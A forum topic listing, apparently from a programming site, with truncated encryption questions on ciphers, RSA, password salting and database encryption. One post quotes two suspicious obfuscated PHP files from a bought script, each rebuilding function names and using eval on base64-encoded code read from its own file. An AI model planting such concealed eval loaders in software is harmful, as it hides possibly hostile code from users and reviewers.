202 Topics
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Hi! I recently created a website that has a contact form that sends an email with the PHP Mailer class. I had to use my gmail account because I cannot get my LAMP server's SMTP protocol working... In my mail.php file, I display the password and account quite openly as … | |
sir i would like to know how to encrypt an image in java (the classes and how to proceed) | |
what is the simplest way i could encrypt my php code from advanced php programmer? | |
Please i am now in my final year and decided to do a project in Network Security.But presently i am blank as to what doable projects i can research on.Please Help suggest projects which you think is good and doable.Post here or email me on *** [email]frank.kent@yahoo.com[/email] *** | |
| #include <iostream> #include <cmath> #include <string> #include <cstdlib> #include <cstring> using namespace std; char Outputing(char shifted_letter); int found_match; int searching_alphabet; int main() { const char ORIGINAL_alphabet[26]={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'}; //maybe const isn't necesery char alphabet[26]={'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'}; cout << "This program encrypts messages using Ceaser Cipher\n"; cout << "\n---------------------------------------------------------"; cout << "\n---------------------------------------------------------"; cout << "\nEnter … |
So I'm trying to write this program in C that will take a message the user types in and encrypt it using an RSA public key that the user supplies. I know there are encryption functions and libraries in C but I want to actually recreate the algorithm in code … | |
Hi all, I am creating a new login form, different from the default login, but when i try to connect to the database. it said password is not correct.. I just realised that password is encrypted. but i dont know what kind of algorithm it uses. I am using joomla … | |
i have to decrypt a frame on my server. encrypted frame is coming from client device through GPRS on socket.encryption is done with "TripleDes" and with a given key.same algorithm and key i am using n server side. frame is a combination of Hex and Ascii String. problem is when … | |
| I have problem with this part of the code private char encryptChar(char c, int shift) { if (Character.isLetter(c)) return (char) ('A' + (c - 'A' + shift) % 26); else return c; } private String encryptMessage(String msg, int shift) { String result = ""; for (int i = 0; i … |
Hi there, I have recently been looking into encryption, for MySQL and php, to figure out someway to encrypt the information in the database, or more to the point before it goes in, or decrypted when it comes out. What I'd like to happen is for the info submitted from … | |
Im creating a banking system for a university assignment. Basically I have been struggling with encrypting user data. Its a first year assignment (in a 3 year bachelor) please bear this in mind when commenting x))) [CODE] //The constructor sets the global veriable key to a user defined value. //The … | |
| It doesn't run! Can you help me please? Devc++ compiles it, and also launch the exe file, but it stops after the second for cycle! Why? :D [CODE]#include <iostream> #include <string> using namespace std; int main() { int N,i,z; cout<<"Digitare il umero di caratteri che contengono il nome "; cin>>N; … |
A company transmits data over the telephone, but it's concerned that its phones could be tapped. All its data is transmitted as four-digit integers. The company has asked you to write an application that encrypts its data so that it may be transferred more securely. Encryption is the process of … | |
Hi I was wondering why I have an error in this program every time I try to do a long encryption. For example, encrypting an ebook or long document. I only occurs in the advanced encryption and advanced decryption functions. I'm pretty sure it has something to do with memory … | |
I have been doing some research on how to go about using a random salt per user's password. There are a few things that I am still unsure about. It is easy enough to store a random hash using something as the following: [CODE] <?php $password = 'MySuperSectretPassword!'; $salt = … | |
I'm trying to make encryption program but when i run the program it gives me this error: Debug Assertion Failed! Program:...nts\visual studio 2010\projects\encrypter\debug\encrypter.exe File:c:\program files\microsoft visual studio 10.0\vc\include\xstring Line:1441 Expression: string subscript out of range For information on how your program can cause assertion failure, see the Visual C++ documentation … | |
I am working to take c code from an academic paper and edit. I am studying cryptographic algorithms. I have ran the following code, but I am having a little difficulty understanding two things. First, the program uses unsigned long ints. When they are added or subtracted, I don't get … | |
I have been programming in C++ for a while now. I heard about RSA Encryption algorithm, and i have read many online sites on how it works. But i still cant grasp how the algorithm works. i have tried to make programs with RSA, but they doesnt encrypt. If you … | |
I am looking to encrypt data (preferably XTEA) on my .Net Micro Framework, send it to a webservice in .Net (Azure) and decrypt it there. I found this [URL="http://www.dmcinfo.com/Blog/articleType/ArticleView/articleId/83/Encryption-Compatibility-Between-NET-Micro-Framework-and-the-Full-NET-Framework.aspx"]blog post[/URL] but I am unable to get it to work. The encryption result on .Net differs from the .NetMF. I hope … | |
British software developer Conseal Security has just launched a rather clever solution to the problem of securing the data on your portable media such as USB thumb drives and portable hard drives while at the same time maintaining fully centralized control of the management of those devices without breaking the … | |
Although, I could easily state quite a few people will be bored with these, I couldn't find someone else with my problem. The code below runs, though doesn't decrypt. It gets to the first "Error: Unidentified Character" and ends. Any help great appreciated. [CODE]#include <iostream> #include <string> #include <array> #include … | |
i want to knw that how to decrypt stored password in oracle database.. | |
I wanna try my self as an experience. Scenario: I have a member join and member log-in wherein the pass word is encrypted in the database (MySQL) Now let's say he forgot the password it too lazy to just open your email account for just getting the password recovery. What … | |
Does anyone know of a way to encrypt a string and output it as x number of characters? I need it to always return the same number of characters. I know MD5 always returns it as 32 characters. I'd like for it to return less that that, maybe 20 or … | |
Hy , I have to encrypt a message and then decrypt it. I have this code , but i need to save the encrypted string in a database and the code generates a random key every time. I could save the string and the key in the database but that … | |
hey guy's I'm relatively new to C++ and I've been asked to make a Caesar Cipher. I'm supposed to take an encrypted .txt file and output it's decryption. I've sort of got an idea of my flow as shown below but I'm confused as to how to transform capitals in … | |
What is the best approach we can follow while trying to solve a cipher text without a key? I searched over web but was unable to find some good method.... Plz help guys... | |
I bought a script but it has two suspects encrypted files that I want to decrypt. Does anyone know how to do? [CODE]<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=484;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGY0KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLT09NHeEXHr8XhtONT08XHeEXHr8Pkr8XTzEXT08XHtILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tmklFbapFMagd25jcUEPwtwVRJ9jd25MDBFVFoiXwJLIKXppcJEPwolVfucidtEPwtOgA0aTA0lNTlSJdo9mDB5gCBOsDB5gDBWJbUEpwe09weEIhWp7tMilCBOlFJEPwtkSd2YifolvdjppdMOlGt5XDuEJhUE7tMa4DbWIhtEpweShgWpZcby1Dbklb29VC2AIhtEJRJ4vC2xiF3YlFZ9sDbYjRMc1dMHVFoiXwJLIKXpZcby1Dbklb29VC2AIhtEJRJ4vC2xiF3YlFZ9sCB5pFuaSCbOlRmnPFtwpweShkoOiforINUnVcbFIOoy0CA1idMlXfBxifo9ZwtIIhUE7tJO0DbOScUE9wtOLCbOiRT5zcBxlC3WIhtEJA2l0cA1idMymcbwJRtwQwJxiFmkiGUEPwtkTDbOlaMyZDByJdoAJNT4JA2l0cA5idBAJhUEpweShkuOpfoxlwe0IkuOpfoxlBznfweSh[/CODE] and: [CODE]<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=1804;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NGY1KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdFbnRlcnlvdXdraFJIWUtOV09VVEFhQmJDY0RkRmZHZ0lpSmpMbE1tUHBRcVNzVnZYeFp6MDEyMzQ1Njc4OSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>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[/CODE] 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Hey all I need to convert audio file of wav format into text file in order to feed it as input to an encryption algorithm(IBE encrypt method of [URL="http://www.shamus.ie/"]Miracl[/URL] library takes only texts as input) and have to reconvert the decrypted text file to audio format. Could you please suggest … | |
Here is capital letter style caesar crypted message. We can simply try all possible shifts for first few words (ignoring punctuations, which is left as is). If both first words succeed we assume we cracked it. You could also use Vigenère encryption, but keeping non-letters is less simple, our Vigenère … |
The End.